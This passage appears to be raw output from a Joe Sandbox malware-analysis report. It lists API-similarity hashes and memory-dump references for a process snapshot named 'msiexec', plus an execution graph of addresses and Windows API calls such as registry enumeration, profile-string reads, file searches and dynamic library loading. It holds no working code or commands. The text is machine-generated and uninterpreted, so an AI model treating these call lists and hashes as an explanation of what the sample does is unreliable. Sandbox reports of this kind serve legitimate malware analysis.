                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2605342592-0
                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1961120804-0
                                                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.1%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0.5%
                                                                                              Total number of Nodes:758
                                                                                              Total number of Limit Nodes:20
                                                                                              execution_graph 33686 40fc40 70 API calls 33861 403640 21 API calls 33687 427fa4 42 API calls 33862 412e43 _endthreadex 33863 425115 76 API calls __fprintf_l 33864 43fe40 133 API calls 33690 425115 83 API calls __fprintf_l 33691 401445 memcpy memcpy DialogBoxParamA 33692 440c40 34 API calls 32910 444c4a 32929 444e38 32910->32929 32912 444c56 GetModuleHandleA 32913 444c68 __set_app_type __p__fmode __p__commode 32912->32913 32915 444cfa 32913->32915 32916 444d02 __setusermatherr 32915->32916 32917 444d0e 32915->32917 32916->32917 32930 444e22 _controlfp 32917->32930 32919 444d13 _initterm __getmainargs _initterm 32920 444d6a GetStartupInfoA 32919->32920 32922 444d9e GetModuleHandleA 32920->32922 32931 40cf44 32922->32931 32926 444dcf _cexit 32928 444e04 32926->32928 32927 444dc8 exit 32927->32926 32929->32912 32930->32919 32982 404a99 LoadLibraryA 32931->32982 32933 40cf60 32934 40cf64 32933->32934 32990 410d0e 32933->32990 32934->32926 32934->32927 32936 40cf6f 32994 40ccd7 ??2@YAPAXI 32936->32994 32938 40cf9b 33008 407cbc 32938->33008 32943 40cfc4 33027 409825 memset 32943->33027 32944 40cfd8 33032 4096f4 memset 32944->33032 32949 40d181 ??3@YAXPAX 32952 40d1b3 32949->32952 32953 40d19f DeleteObject 32949->32953 32950 407e30 _strcmpi 32951 40cfee 32950->32951 32954 40cff2 RegDeleteKeyA 32951->32954 32955 40d007 EnumResourceTypesA 32951->32955 33056 407948 free free 32952->33056 32953->32952 32954->32949 32957 40d047 32955->32957 32958 40d02f MessageBoxA 32955->32958 32961 40d0a0 CoInitialize 32957->32961 33037 40ce70 32957->33037 32958->32949 32959 40d1c4 33057 4080d4 free 32959->33057 33054 40cc26 strncat memset RegisterClassA CreateWindowExA 32961->33054 32962 40d1cd 33058 407948 free free 32962->33058 32967 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33055 40c256 PostMessageA 32967->33055 32968 40d061 ??3@YAXPAX 32968->32952 32972 40d084 DeleteObject 32968->32972 32969 40d09e 32969->32961 32972->32952 32974 40d0f9 GetMessageA 32975 40d17b CoUninitialize 32974->32975 32976 40d10d 32974->32976 32975->32949 32977 40d113 TranslateAccelerator 32976->32977 32979 40d145 IsDialogMessage 32976->32979 32980 40d139 IsDialogMessage 32976->32980 32977->32976 32978 40d16d GetMessageA 32977->32978 32978->32975 32978->32977 32979->32978 32981 40d157 TranslateMessage DispatchMessageA 32979->32981 32980->32978 32980->32979 32981->32978 32983 404ac4 GetProcAddress 32982->32983 32984 404aec 32982->32984 32985 404ad4 32983->32985 32986 404add FreeLibrary 32983->32986 32988 404b13 32984->32988 32989 404afc MessageBoxA 32984->32989 32985->32986 32986->32984 32987 404ae8 32986->32987 32987->32984 32988->32933 32989->32933 32991 410d17 LoadLibraryA 32990->32991 32992 410d3c 32990->32992 32991->32992 32993 410d2b GetProcAddress 32991->32993 32992->32936 32993->32992 32995 40cd08 ??2@YAPAXI 32994->32995 32997 40cd26 32995->32997 32998 40cd2d 32995->32998 33066 404025 6 API calls 32997->33066 33000 40cd66 32998->33000 33001 40cd59 DeleteObject 32998->33001 33059 407088 33000->33059 33001->33000 33003 40cd6b 33062 4019b5 33003->33062 33006 4019b5 strncat 33007 40cdbf _mbscpy 33006->33007 33007->32938 33068 407948 free free 33008->33068 33011 407cf7 33013 407a1f malloc memcpy free free 33011->33013 33014 407ddc 33011->33014 33015 407d83 33011->33015 33016 407d7a free 33011->33016 33022 407e04 33011->33022 33072 40796e 7 API calls 33011->33072 33013->33011 33014->33022 33074 407a1f 33014->33074 33015->33011 33073 406f30 malloc memcpy free 33015->33073 33016->33011 33069 407a55 33022->33069 33023 407e30 33024 407e38 33023->33024 33025 407e57 33023->33025 33024->33025 33026 407e41 _strcmpi 33024->33026 33025->32943 33025->32944 33026->33024 33026->33025 33082 4097ff 33027->33082 33029 409854 33087 409731 33029->33087 33033 4097ff 3 API calls 33032->33033 33034 409723 33033->33034 33107 40966c 33034->33107 33121 4023b2 33037->33121 33043 40ced3 33205 40cdda 7 API calls 33043->33205 33044 40cece 33047 40cf3f 33044->33047 33158 40c3d0 memset GetModuleFileNameA strrchr 33044->33158 33047->32968 33047->32969 33050 40ceed 33184 40affa 33050->33184 33054->32967 33055->32974 33056->32959 33057->32962 33058->32934 33067 406fc7 memset _mbscpy 33059->33067 33061 40709f CreateFontIndirectA 33061->33003 33063 4019e1 33062->33063 33064 4019c2 strncat 33063->33064 33065 4019e5 memset LoadIconA 33063->33065 33064->33063 33065->33006 33066->32998 33067->33061 33068->33011 33070 407a65 33069->33070 33071 407a5b free 33069->33071 33070->33023 33071->33070 33072->33011 33073->33015 33075 407a38 33074->33075 33076 407a2d free 33074->33076 33081 406f30 malloc memcpy free 33075->33081 33077 407a44 33076->33077 33080 40796e 7 API calls 33077->33080 33079 407a43 33079->33077 33080->33022 33081->33079 33098 406f96 GetModuleFileNameA 33082->33098 33084 409805 strrchr 33085 409814 33084->33085 33086 409817 _mbscat 33084->33086 33085->33086 33086->33029 33099 44b090 33087->33099 33092 40930c 3 API calls 33093 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33092->33093 33094 4097c5 LoadStringA 33093->33094 33097 4097db 33094->33097 33096 4097f3 33096->32949 33097->33094 33097->33096 33106 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33097->33106 33098->33084 33100 40973e _mbscpy _mbscpy 33099->33100 33101 40930c 33100->33101 33102 44b090 33101->33102 33103 409319 memset GetPrivateProfileStringA 33102->33103 33104 409374 33103->33104 33105 409364 WritePrivateProfileStringA 33103->33105 33104->33092 33105->33104 33106->33097 33117 406f81 GetFileAttributesA 33107->33117 33109 409675 33110 4096ee 33109->33110 33111 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33109->33111 33110->32950 33118 409278 GetPrivateProfileStringA 33111->33118 33113 4096c9 33119 409278 GetPrivateProfileStringA 33113->33119 33115 4096da 33120 409278 GetPrivateProfileStringA 33115->33120 33117->33109 33118->33113 33119->33115 33120->33110 33207 409c1c 33121->33207 33124 401e69 memset 33246 410dbb 33124->33246 33127 401ec2 33270 4070e3 strlen _mbscat _mbscpy _mbscat 33127->33270 33128 401ed4 33259 406f81 GetFileAttributesA 33128->33259 33131 401ee6 strlen strlen 33133 401f15 33131->33133 33134 401f28 33131->33134 33271 4070e3 strlen _mbscat _mbscpy _mbscat 33133->33271 33260 406f81 GetFileAttributesA 33134->33260 33137 401f35 33261 401c31 33137->33261 33140 401f75 33142 402165 33140->33142 33143 401f9c memset 33140->33143 33141 401c31 5 API calls 33141->33140 33144 402195 ExpandEnvironmentStringsA 33142->33144 33145 4021a8 _strcmpi 33142->33145 33272 410b62 RegEnumKeyExA 33143->33272 33278 406f81 GetFileAttributesA 33144->33278 33145->33043 33145->33044 33148 401fd9 atoi 33149 401fef memset memset sprintf 33148->33149 33156 401fc9 33148->33156 33273 410b1e 33149->33273 33152 406f81 GetFileAttributesA 33152->33156 33153 402076 memset memset strlen strlen 33153->33156 33154 4070e3 strlen _mbscat _mbscpy _mbscat 33154->33156 33155 4020dd strlen strlen 33155->33156 33156->33142 33156->33148 33156->33152 33156->33153 33156->33154 33156->33155 33157 402167 _mbscpy 33156->33157 33277 410b62 RegEnumKeyExA 33156->33277 33157->33142 33159 40c422 33158->33159 33160 40c425 _mbscat _mbscpy _mbscpy 33158->33160 33159->33160 33161 40c49d 33160->33161 33162 40c512 33161->33162 33163 40c502 GetWindowPlacement 33161->33163 33164 40c538 33162->33164 33296 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33162->33296 33163->33162 33289 409b31 33164->33289 33168 40ba28 33169 40ba87 33168->33169 33175 40ba3c 33168->33175 33299 406c62 LoadCursorA SetCursor 33169->33299 33171 40ba8c 33300 403c16 33171->33300 33366 4107f1 33171->33366 33369 404734 33171->33369 33377 404785 33171->33377 33172 40ba43 _mbsicmp 33172->33175 33173 40baa0 33174 407e30 _strcmpi 33173->33174 33178 40bab0 33174->33178 33175->33169 33175->33172 33380 40b5e5 10 API calls 33175->33380 33176 40bafa SetCursor 33176->33050 33178->33176 33179 40baf1 qsort 33178->33179 33179->33176 33670 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33184->33670 33186 40b00e 33187 40b016 33186->33187 33188 40b01f GetStdHandle 33186->33188 33671 406d1a CreateFileA 33187->33671 33190 40b01c 33188->33190 33191 40b035 33190->33191 33192 40b12d 33190->33192 33672 406c62 LoadCursorA SetCursor 33191->33672 33676 406d77 9 API calls 33192->33676 33195 40b136 33206 40c580 28 API calls 33195->33206 33196 40b087 33203 40b0a1 33196->33203 33674 40a699 12 API calls 33196->33674 33197 40b042 33197->33196 33197->33203 33673 40a57c strlen WriteFile 33197->33673 33200 40b0d6 33201 40b116 CloseHandle 33200->33201 33202 40b11f SetCursor 33200->33202 33201->33202 33202->33195 33203->33200 33675 406d77 9 API calls 33203->33675 33205->33044 33206->33047 33219 409a32 33207->33219 33210 409c80 memcpy memcpy 33211 409cda 33210->33211 33211->33210 33212 409d18 ??2@YAPAXI ??2@YAPAXI 33211->33212 33213 408db6 12 API calls 33211->33213 33215 409d54 ??2@YAPAXI 33212->33215 33216 409d8b 33212->33216 33213->33211 33215->33216 33229 409b9c 33216->33229 33218 4023c1 33218->33124 33220 409a44 33219->33220 33221 409a3d ??3@YAXPAX 33219->33221 33222 409a52 33220->33222 33223 409a4b ??3@YAXPAX 33220->33223 33221->33220 33224 409a63 33222->33224 33225 409a5c ??3@YAXPAX 33222->33225 33223->33222 33226 409a83 ??2@YAPAXI ??2@YAPAXI 33224->33226 33227 409a73 ??3@YAXPAX 33224->33227 33228 409a7c ??3@YAXPAX 33224->33228 33225->33224 33226->33210 33227->33228 33228->33226 33230 407a55 free 33229->33230 33231 409ba5 33230->33231 33232 407a55 free 33231->33232 33233 409bad 33232->33233 33234 407a55 free 33233->33234 33235 409bb5 33234->33235 33236 407a55 free 33235->33236 33237 409bbd 33236->33237 33238 407a1f 4 API calls 33237->33238 33239 409bd0 33238->33239 33240 407a1f 4 API calls 33239->33240 33241 409bda 33240->33241 33242 407a1f 4 API calls 33241->33242 33243 409be4 33242->33243 33244 407a1f 4 API calls 33243->33244 33245 409bee 33244->33245 33245->33218 33247 410d0e 2 API calls 33246->33247 33248 410dca 33247->33248 33249 410dfd memset 33248->33249 33279 4070ae 33248->33279 33251 410e1d 33249->33251 33252 410e7f _mbscpy 33251->33252 33282 410d3d _mbscpy 33251->33282 33254 401e9e strlen strlen 33252->33254 33254->33127 33254->33128 33256 410e5b 33283 410add RegQueryValueExA 33256->33283 33258 410e73 33258->33252 33259->33131 33260->33137 33262 401c4c 33261->33262 33266 401ca1 33262->33266 33284 410add RegQueryValueExA 33262->33284 33264 401c6a 33265 401c71 strchr 33264->33265 33264->33266 33265->33266 33267 401c85 strchr 33265->33267 33266->33140 33266->33141 33267->33266 33268 401c94 33267->33268 33285 406f06 strlen 33268->33285 33270->33128 33271->33134 33272->33156 33274 410b34 33273->33274 33275 410b4c 33274->33275 33288 410add RegQueryValueExA 33274->33288 33275->33156 33277->33156 33278->33145 33280 4070bd GetVersionExA 33279->33280 33281 4070ce 33279->33281 33280->33281 33281->33249 33281->33254 33282->33256 33283->33258 33284->33264 33286 406f17 33285->33286 33287 406f1a memcpy 33285->33287 33286->33287 33287->33266 33288->33275 33290 409b40 33289->33290 33292 409b4e 33289->33292 33297 409901 memset SendMessageA 33290->33297 33293 409b99 33292->33293 33294 409b8b 33292->33294 33293->33168 33298 409868 SendMessageA 33294->33298 33296->33164 33297->33292 33298->33293 33299->33171 33301 4107f1 FreeLibrary 33300->33301 33302 403c30 LoadLibraryA 33301->33302 33303 403c74 33302->33303 33304 403c44 GetProcAddress 33302->33304 33306 4107f1 FreeLibrary 33303->33306 33304->33303 33305 403c5e 33304->33305 33305->33303 33309 403c6b 33305->33309 33307 403c7b 33306->33307 33308 404734 3 API calls 33307->33308 33310 403c86 33308->33310 33309->33307 33381 4036e5 33310->33381 33313 4036e5 27 API calls 33314 403c9a 33313->33314 33315 4036e5 27 API calls 33314->33315 33316 403ca4 33315->33316 33317 4036e5 27 API calls 33316->33317 33318 403cae 33317->33318 33393 4085d2 33318->33393 33324 403cd2 33326 403cf7 33324->33326 33545 402bd1 37 API calls 33324->33545 33327 403d1c 33326->33327 33546 402bd1 37 API calls 33326->33546 33428 402c5d 33327->33428 33331 4070ae GetVersionExA 33332 403d31 33331->33332 33334 403d61 33332->33334 33547 402b22 42 API calls 33332->33547 33336 403d97 33334->33336 33548 402b22 42 API calls 33334->33548 33337 403dcd 33336->33337 33549 402b22 42 API calls 33336->33549 33440 410808 33337->33440 33341 404785 FreeLibrary 33342 403de8 33341->33342 33444 402fdb 33342->33444 33345 402fdb 29 API calls 33346 403e00 33345->33346 33456 4032b7 33346->33456 33355 403e3b 33357 403e73 33355->33357 33358 403e46 _mbscpy 33355->33358 33503 40fb00 33357->33503 33551 40f334 333 API calls 33358->33551 33367 410807 33366->33367 33368 4107fc FreeLibrary 33366->33368 33367->33173 33368->33367 33370 404785 FreeLibrary 33369->33370 33371 40473b LoadLibraryA 33370->33371 33372 40474c GetProcAddress 33371->33372 33373 40476e 33371->33373 33372->33373 33374 404764 33372->33374 33375 404781 33373->33375 33376 404785 FreeLibrary 33373->33376 33374->33373 33375->33173 33376->33375 33378 4047a3 33377->33378 33379 404799 FreeLibrary 33377->33379 33378->33173 33379->33378 33380->33175 33382 4037c5 33381->33382 33383 4036fb 33381->33383 33382->33313 33552 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33383->33552 33385 40370e 33385->33382 33386 403716 strchr 33385->33386 33386->33382 33387 403730 33386->33387 33553 4021b6 memset 33387->33553 33389 40373f _mbscpy _mbscpy strlen 33390 4037a4 _mbscpy 33389->33390 33391 403789 sprintf 33389->33391 33554 4023e5 16 API calls 33390->33554 33391->33390 33394 4085e2 33393->33394 33555 4082cd 11 API calls 33394->33555 33396 4085ec 33397 403cba 33396->33397 33398 40860b memset 33396->33398 33405 40821d 33397->33405 33557 410b62 RegEnumKeyExA 33398->33557 33400 408637 33400->33397 33401 40865c memset 33400->33401 33559 40848b 10 API calls 33400->33559 33560 410b62 RegEnumKeyExA 33400->33560 33558 410add RegQueryValueExA 33401->33558 33406 40823f 33405->33406 33407 403cc6 33406->33407 33408 408246 memset 33406->33408 33413 4086e0 33407->33413 33561 410b62 RegEnumKeyExA 33408->33561 33412 40826f 33412->33407 33562 4080ed 11 API calls 33412->33562 33563 410b62 RegEnumKeyExA 33412->33563 33564 4045db 33413->33564 33415 4088ef 33572 404656 33415->33572 33419 408737 wcslen 33419->33415 33420 40876a 33419->33420 33420->33415 33421 40877a wcsncmp 33420->33421 33423 404734 3 API calls 33420->33423 33424 404785 FreeLibrary 33420->33424 33425 408812 memset 33420->33425 33426 40883c memcpy wcschr 33420->33426 33427 4088c3 LocalFree 33420->33427 33575 40466b _mbscpy 33420->33575 33421->33420 33423->33420 33424->33420 33425->33420 33425->33426 33426->33420 33427->33420 33429 402c7a 33428->33429 33430 402c87 memset 33429->33430 33439 402d9a 33429->33439 33576 410b62 RegEnumKeyExA 33430->33576 33432 410b1e RegQueryValueExA 33433 402ce4 memset sprintf 33432->33433 33436 402cb2 33433->33436 33434 402d3a sprintf 33434->33436 33436->33432 33436->33434 33436->33439 33577 402bd1 37 API calls 33436->33577 33578 402bd1 37 API calls 33436->33578 33579 410b62 RegEnumKeyExA 33436->33579 33439->33331 33441 410816 33440->33441 33442 4107f1 FreeLibrary 33441->33442 33443 403ddd 33442->33443 33443->33341 33445 402ff9 33444->33445 33446 403006 memset 33445->33446 33447 403122 33445->33447 33580 410b62 RegEnumKeyExA 33446->33580 33447->33345 33449 403033 33449->33447 33450 410b1e RegQueryValueExA 33449->33450 33452 4030a2 memset 33449->33452 33453 410b62 RegEnumKeyExA 33449->33453 33582 402db3 24 API calls 33449->33582 33451 403058 memset sprintf 33450->33451 33451->33449 33581 410b62 RegEnumKeyExA 33452->33581 33453->33449 33457 4032d5 33456->33457 33458 4033a9 33456->33458 33583 4021b6 memset 33457->33583 33471 4034e4 memset memset 33458->33471 33460 4032e1 33584 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33460->33584 33462 4032ea 33463 4032f8 memset GetPrivateProfileSectionA 33462->33463 33585 4023e5 16 API calls 33462->33585 33463->33458 33468 40332f 33463->33468 33465 40339b strlen 33465->33458 33465->33468 33467 403350 strchr 33467->33468 33468->33458 33468->33465 33586 4021b6 memset 33468->33586 33587 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33468->33587 33588 4023e5 16 API calls 33468->33588 33472 410b1e RegQueryValueExA 33471->33472 33473 40353f 33472->33473 33474 40357f 33473->33474 33475 403546 _mbscpy 33473->33475 33479 403985 33474->33479 33589 406d55 strlen _mbscat 33475->33589 33477 403565 _mbscat 33590 4033f0 19 API calls 33477->33590 33591 40466b _mbscpy 33479->33591 33483 4039aa 33485 4039ff 33483->33485 33592 40f6e2 33483->33592 33608 40f460 12 API calls 33483->33608 33609 4038e8 21 API calls 33483->33609 33486 404785 FreeLibrary 33485->33486 33487 403a0b 33486->33487 33488 4037ca memset memset 33487->33488 33611 444551 memset 33488->33611 33491 4038e2 33491->33355 33550 40f334 333 API calls 33491->33550 33493 40382e 33494 406f06 2 API calls 33493->33494 33495 403843 33494->33495 33496 406f06 2 API calls 33495->33496 33497 403855 strchr 33496->33497 33498 403884 _mbscpy 33497->33498 33499 403897 strlen 33497->33499 33500 4038bf _mbscpy 33498->33500 33499->33500 33501 4038a4 sprintf 33499->33501 33620 4023e5 16 API calls 33500->33620 33501->33500 33505 40fb10 33503->33505 33504 403e7f 33513 40f96c 33504->33513 33505->33504 33506 40fb55 RegQueryValueExA 33505->33506 33506->33504 33507 40fb84 33506->33507 33508 404734 3 API calls 33507->33508 33509 40fb91 33508->33509 33509->33504 33510 40fc19 LocalFree 33509->33510 33511 40fbdd memcpy memcpy 33509->33511 33510->33504 33624 40f802 7 API calls 33511->33624 33514 4070ae GetVersionExA 33513->33514 33515 40f98d 33514->33515 33516 4045db 7 API calls 33515->33516 33517 40f9a9 33516->33517 33520 40fae6 33517->33520 33521 40fa13 memset WideCharToMultiByte 33517->33521 33518 404656 FreeLibrary 33519 403e85 33518->33519 33525 4442ea memset 33519->33525 33520->33518 33521->33517 33522 40fa43 _strnicmp 33521->33522 33522->33517 33523 40fa5b WideCharToMultiByte 33522->33523 33523->33517 33524 40fa88 WideCharToMultiByte 33523->33524 33524->33517 33526 410dbb 7 API calls 33525->33526 33527 444329 33526->33527 33625 40759e strlen strlen 33527->33625 33532 410dbb 7 API calls 33533 444350 33532->33533 33534 40759e 3 API calls 33533->33534 33535 44435a 33534->33535 33536 444212 64 API calls 33535->33536 33537 444366 memset memset 33536->33537 33538 410b1e RegQueryValueExA 33537->33538 33539 4443b9 ExpandEnvironmentStringsA strlen 33538->33539 33540 4443f4 _strcmpi 33539->33540 33541 4443e5 33539->33541 33542 403e91 33540->33542 33543 44440c 33540->33543 33541->33540 33542->33173 33544 444212 64 API calls 33543->33544 33544->33542 33545->33326 33546->33327 33547->33334 33548->33336 33549->33337 33550->33355 33551->33357 33552->33385 33553->33389 33554->33382 33556 40841c 33555->33556 33556->33396 33557->33400 33558->33400 33559->33400 33560->33400 33561->33412 33562->33412 33563->33412 33565 404656 FreeLibrary 33564->33565 33566 4045e3 LoadLibraryA 33565->33566 33567 404651 33566->33567 33568 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33566->33568 33567->33415 33567->33419 33569 40463d 33568->33569 33570 404643 33569->33570 33571 404656 FreeLibrary 33569->33571 33570->33567 33571->33567 33573 404666 33572->33573 33574 40465c FreeLibrary 33572->33574 33573->33324 33574->33573 33575->33420 33576->33436 33577->33434 33578->33436 33579->33436 33580->33449 33581->33449 33582->33449 33583->33460 33584->33462 33585->33463 33586->33467 33587->33468 33588->33468 33589->33477 33590->33474 33591->33483 33610 40466b _mbscpy 33592->33610 33594 40f6fa 33595 4045db 7 API calls 33594->33595 33596 40f708 33595->33596 33597 404734 3 API calls 33596->33597 33602 40f7e2 33596->33602 33603 40f715 33597->33603 33598 404656 FreeLibrary 33599 40f7f1 33598->33599 33600 404785 FreeLibrary 33599->33600 33601 40f7fc 33600->33601 33601->33483 33602->33598 33603->33602 33604 40f797 WideCharToMultiByte 33603->33604 33605 40f7b8 strlen 33604->33605 33606 40f7d9 LocalFree 33604->33606 33605->33606 33607 40f7c8 _mbscpy 33605->33607 33606->33602 33607->33606 33608->33483 33609->33483 33610->33594 33612 44458b 33611->33612 33615 40381a 33612->33615 33621 410add RegQueryValueExA 33612->33621 33614 4445a4 33614->33615 33622 410add RegQueryValueExA 33614->33622 33615->33491 33619 4021b6 memset 33615->33619 33617 4445c1 33617->33615 33623 444879 30 API calls 33617->33623 33619->33493 33620->33491 33621->33614 33622->33617 33623->33615 33624->33510 33626 4075c9 33625->33626 33627 4075bb _mbscat 33625->33627 33628 444212 33626->33628 33627->33626 33645 407e9d 33628->33645 33631 44424d 33632 444274 33631->33632 33633 444258 33631->33633 33653 407ef8 33631->33653 33634 407e9d 9 API calls 33632->33634 33666 444196 51 API calls 33633->33666 33642 4442a0 33634->33642 33636 407ef8 9 API calls 33636->33642 33637 4442ce 33663 407f90 33637->33663 33641 407f90 FindClose 33643 4442e4 33641->33643 33642->33636 33642->33637 33644 444212 64 API calls 33642->33644 33667 407e62 strcmp strcmp 33642->33667 33643->33532 33644->33642 33646 407f90 FindClose 33645->33646 33647 407eaa 33646->33647 33648 406f06 2 API calls 33647->33648 33649 407ebd strlen strlen 33648->33649 33650 407ee1 33649->33650 33651 407eea 33649->33651 33668 4070e3 strlen _mbscat _mbscpy _mbscat 33650->33668 33651->33631 33654 407f03 FindFirstFileA 33653->33654 33655 407f24 FindNextFileA 33653->33655 33656 407f3f 33654->33656 33657 407f46 strlen strlen 33655->33657 33658 407f3a 33655->33658 33656->33657 33660 407f7f 33656->33660 33657->33660 33661 407f76 33657->33661 33659 407f90 FindClose 33658->33659 33659->33656 33660->33631 33669 4070e3 strlen _mbscat _mbscpy _mbscat 33661->33669 33664 407fa3 33663->33664 33665 407f99 FindClose 33663->33665 33664->33641 33665->33664 33666->33631 33667->33642 33668->33651 33669->33660 33670->33186 33671->33190 33672->33197 33673->33196 33674->33203 33675->33200 33676->33195 33694 411853 RtlInitializeCriticalSection memset 33695 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33870 40a256 13 API calls 33872 432e5b 17 API calls 33874 43fa5a 20 API calls 33697 401060 41 API calls 33877 427260 CloseHandle memset memset 33701 410c68 FindResourceA SizeofResource LoadResource LockResource 33879 405e69 14 API calls 33703 433068 15 API calls __fprintf_l 33881 414a6d 18 API calls 33882 43fe6f 134 API calls 33705 424c6d 15 API calls __fprintf_l 33883 426741 19 API calls 33707 440c70 17 API calls 33708 443c71 42 API calls 33711 427c79 24 API calls 33886 416e7e memset __fprintf_l 33714 43f400 15 API calls 33715 42800b 47 API calls 33716 425115 82 API calls __fprintf_l 33889 41960c 61 API calls 33717 43f40c 122 API calls __fprintf_l 33720 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33721 43f81a 20 API calls 33723 414c20 memset memset 33724 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 33893 414625 18 API calls 33894 404225 modf 33895 403a26 strlen WriteFile 33897 40422a 12 API calls 33901 427632 memset memset memcpy 33902 40ca30 59 API calls 33903 404235 26 API calls 33726 425115 76 API calls __fprintf_l 33904 425115 77 API calls __fprintf_l 33906 44223a 38 API calls 33732 43183c 112 API calls 33907 44b2c5 _onexit __dllonexit 33912 42a6d2 memcpy __allrem 33734 405cda 60 API calls 33920 43fedc 138 API calls 33921 4116e1 16 API calls __fprintf_l 33737 4244e6 19 API calls 33739 42e8e8 127 API calls __fprintf_l 33740 4118ee RtlLeaveCriticalSection 33926 43f6ec 22 API calls 33742 425115 119 API calls __fprintf_l 33743 410cf3 EnumResourceNamesA 33929 4492f0 memcpy memcpy 33931 43fafa 18 API calls 33933 4342f9 15 API calls __fprintf_l 33744 4144fd 19 API calls 33935 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 33936 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33939 443a84 _mbscpy 33941 43f681 17 API calls 33747 404487 22 API calls 33943 415e8c 16 API calls __fprintf_l 33751 411893 RtlDeleteCriticalSection __fprintf_l 33752 41a492 42 API calls 33947 403e96 34 API calls 33948 410e98 memset SHGetPathFromIDList SendMessageA 33754 426741 109 API calls __fprintf_l 33755 4344a2 18 API calls 33756 4094a2 10 API calls 33951 4116a6 15 API calls __fprintf_l 33952 43f6a4 17 API calls 33953 440aa3 20 API calls 33955 427430 45 API calls 33759 4090b0 7 API calls 33760 4148b0 15 API calls 33762 4118b4 RtlEnterCriticalSection 33763 4014b7 CreateWindowExA 33764 40c8b8 19 API calls 33766 4118bf RtlTryEnterCriticalSection 33960 42434a 18 API calls __fprintf_l 33962 405f53 12 API calls 33774 43f956 59 API calls 33776 40955a 17 API calls 33777 428561 36 API calls 33778 409164 7 API calls 33966 404366 19 API calls 33970 40176c ExitProcess 33973 410777 42 API calls 33783 40dd7b 51 API calls 33784 425d7c 16 API calls __fprintf_l 33975 43f6f0 25 API calls 33976 42db01 22 API calls 33785 412905 15 API calls __fprintf_l 33977 403b04 54 API calls 33978 405f04 SetDlgItemTextA GetDlgItemTextA 33979 44b301 ??3@YAXPAX 33982 4120ea 14 API calls 3 library calls 33983 40bb0a 8 API calls 33985 413f11 strcmp 33789 434110 17 API calls __fprintf_l 33791 425115 108 API calls __fprintf_l 33986 444b11 _onexit 33793 425115 76 API calls __fprintf_l 33796 429d19 10 API calls 33989 444b1f __dllonexit 33990 409f20 _strcmpi 33798 42b927 31 API calls 33993 433f26 19 API calls __fprintf_l 33994 44b323 FreeLibrary 33995 427f25 46 API calls 33996 43ff2b 17 API calls 33997 43fb30 19 API calls 33805 414d36 16 API calls 33807 40ad38 7 API calls 33999 433b38 16 API calls __fprintf_l 33677 44b33b 33678 44b344 ??3@YAXPAX 33677->33678 33679 44b34b 33677->33679 33678->33679 33680 44b354 ??3@YAXPAX 33679->33680 33681 44b35b 33679->33681 33680->33681 33682 44b364 ??3@YAXPAX 33681->33682 33683 44b36b 33681->33683 33682->33683 33684 44b374 ??3@YAXPAX 33683->33684 33685 44b37b 33683->33685 33684->33685 33811 426741 21 API calls 33812 40c5c3 123 API calls 33814 43fdc5 17 API calls 34000 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33817 4161cb memcpy memcpy memcpy memcpy 34005 43ffc8 18 API calls 34007 4383cc 110 API calls __fprintf_l 33819 4275d3 41 API calls 34008 4153d3 22 API calls __fprintf_l 33820 444dd7 _XcptFilter 34013 4013de 15 API calls 34015 425115 111 API calls __fprintf_l 34016 43f7db 18 API calls 34019 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33823 4335ee 16 API calls __fprintf_l 34021 429fef 11 API calls 33824 444deb _exit _c_exit 34022 40bbf0 133 API calls 33827 425115 79 API calls __fprintf_l 34026 437ffa 22 API calls 33831 4021ff 14 API calls 33832 43f5fc 149 API calls 34027 40e381 9 API calls 33834 405983 40 API calls 33835 42b186 27 API calls __fprintf_l 33836 427d86 76 API calls 33837 403585 20 API calls 33839 42e58e 18 API calls __fprintf_l 33842 425115 75 API calls __fprintf_l 33844 401592 8 API calls 32883 410b92 32886 410a6b 32883->32886 32885 410bb2 32887 410a77 32886->32887 32888 410a89 GetPrivateProfileIntA 32886->32888 32891 410983 memset _itoa WritePrivateProfileStringA 32887->32891 32888->32885 32890 410a84 32890->32885 32891->32890 34031 434395 16 API calls 33846 441d9c memcmp 34033 43f79b 119 API calls 33847 40c599 42 API calls 